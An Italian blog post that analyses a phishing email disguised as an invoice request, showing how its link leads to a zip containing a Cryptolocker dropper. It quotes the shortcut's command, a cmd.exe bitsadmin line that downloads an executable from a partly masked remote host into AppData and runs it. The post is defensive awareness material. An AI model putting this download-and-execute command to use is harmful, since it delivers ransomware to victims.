Qui siamo in presenza di un tentativo di infettarti con un bel Cryptolocker quindi massima attenzione a quello che ti dico e a tutte le informazioni che ti servono per identificare questa email.
Analisi di un Cryptolocker in tempo reale
Il mittente è betta [email protected]
Ecco invece l’email
Buongiorno Gentile Cliente,
In allegato Vi invio come da Voi desiderato la fattura 613415 del 19-04-2017 Nota disponibile qui
_____________________________________
rosalia
Cordiali Saluti
Vi ricordiamo che siete tenuti a stampare e conservare la fattura allegata come da art. 21 – DPR 183/32, succ. modifiche e da risoluzione Ministero delle Finanze R.M. 30/07/1990 Nessuna copia verra’ inviata a mezzo servizio postale.
Il messaggio e’ stato c o n t r o l l a t o da COMODO Antivirus
—–Messaggio originale—-
Da: [email protected]
Data:8/2/2017 03:56:06
A: [email protected]
Ogg: richiesta fattura 613415
Mi и stato detto che mi sarei dovuta far fare una fattura di acconto datata 2015
In sostanza ti dicono che ti mandano la copia della fattura facendo finta che sia una richiesta che arriva da te – vedi dove dice messaggio originale – e dandoti come al solito un link per scaricarla.
Già questo è sospetto perché se uno manda una copia della fattura di solito allega un pdf all’email, non dice di andare su un sito per scaricarla, anche perché dovrebbe esserci un sistema di utenti e password che tu dovresti avere già in mano se questo dovesse essere il sistema che l’azienda utilizza.
L’email del mittente è assolutamente falsa, non tanto per la prima parte – ciceromontaggi – quando per il dominio del mittente – kuzyk.org che, se vai a vedere, è un dominio in vendita dove non c’è nulla.
Il link sotto la scritta Nota disponibile qui è altrettanto fasullo e non corrisponde al dominio del mittente come invece dovrebbe essere.
Ho cliccato sul link, e l’ho fatto perché cryptolocker su Mac OS X non funziona, e, come sospettavo mi è apparso il classico messaggio che mi dice che
I dispositivi cellulari non sono supportati
È necessario usare un computer Windows affinché SimXTextEngine funzioni correttamente.
Al momento, i sistemi operanti su dispositivi mobile, tra cui iOS e Andriod, non sono supportati.
proprio perché Cryptolocker funziona solo su Windows e non sugli smartphone o su Mac o Linux. Il messaggio ha lo scopo di farti credere che per scaricare la fattura devi usare un PC Windows, in modo che tu ti rivolga, magari, a qualcuno che ha Windows per fargli scaricare la fattura e così gli distruggi tutti i documenti che ha.
Usando una macchina virtuale con VMWare Fusion, cioè un sistema per fare girare Windows e tutti i programmi, sotto Mac OS X, ho aperto il link che mi ha chiesto di scaricare uno .zip, cosa che ho fatto
Lo zip contiene quello che “sembra” un documento che non si capisce bene cosa sia, ma cliccando con il tasto destro e chiedendone le Proprietà, appare questo
Spiegazione leggermente più tecnica del solito, puoi saltarla se non ti interessa
Che mi dice prima di tutto che questo non è un documento ma un’applicazione, o meglio un link che esegue questo comando che ai più sembrerà oscuro. Ho provveduto a nascondere l’url per evitare che qualcuno si faccia del male.
C:\Windows\System32\cmd.exe /k bitsadmin /transfer cola /priority high hxxp://icaan.evak....../load11.bin %AppData%\host11.exe & %AppData%\host11.exe & exit
In sostanza questo comando scarica un file eseguibile da un sito remoto e lo esegue e questo è il Cryptolocker vero e proprio che poi, una volta eseguito, comincia a crittografare il tuo disco fisso e ti presenta la richiesta di riscatto.
Come verificare se un file è malware
Se hai saltato la spiegazione tecnica, senza assolutamente aprire il file, segui la procedura per controllare se il file è un malware o meno che ho spiegato in un articolo tempo fa. In sostanza puoi caricare il file che hai scaricato su virustotal.com e ti verrà detto subito che è un file sospetto da non aprire.
Perché la gente scarica un Cryptolocker e si distrugge la vita lavorativa?
Domanda da un milione di dollari.
Purtroppo la verità unica non esiste e ognuno lo fa per i motivi più disparati. Quello che voglio sottolineare è che in tutti questi casi è richiesta un’azione da parte dell’utente; non è che cliccando sull’email che arriva succede l’apocalisse; bisogna scaricare un file, scompattarlo e farlo partire; un file che, per giunta, non è neppure identificato come documento riconoscibile che so, un pdf o un documento di Word.
Quindi sono richieste azioni da parte dell’utente, azioni che si sarebbero potute evitare con un minimo di conoscenza – e a questo serve il blog che stai leggendo – e con un minimo di attenzione, non aprendo a caso documenti e non seguendo pedissequamente tutto quello che c’è scritto in un’email che ha tutti gli attributi per essere sospetta.
Per forza di cose questo articolo è andato un po’ più nel dettaglio ma non sei obbligato a seguire tutto quello che ti ho mostrato o a capire come vedere se un file è sospetto o meno. Seguendo la procedura che ti ho illustrato, quella di Virustotal, avresti subito capito che il file e la relativa email erano subito da cancellare. Ricorda che l’infezione si prende agendo sul file, non semplicemente scaricandolo anche se ci sono delle eccezioni, quindi sempre massima cautela!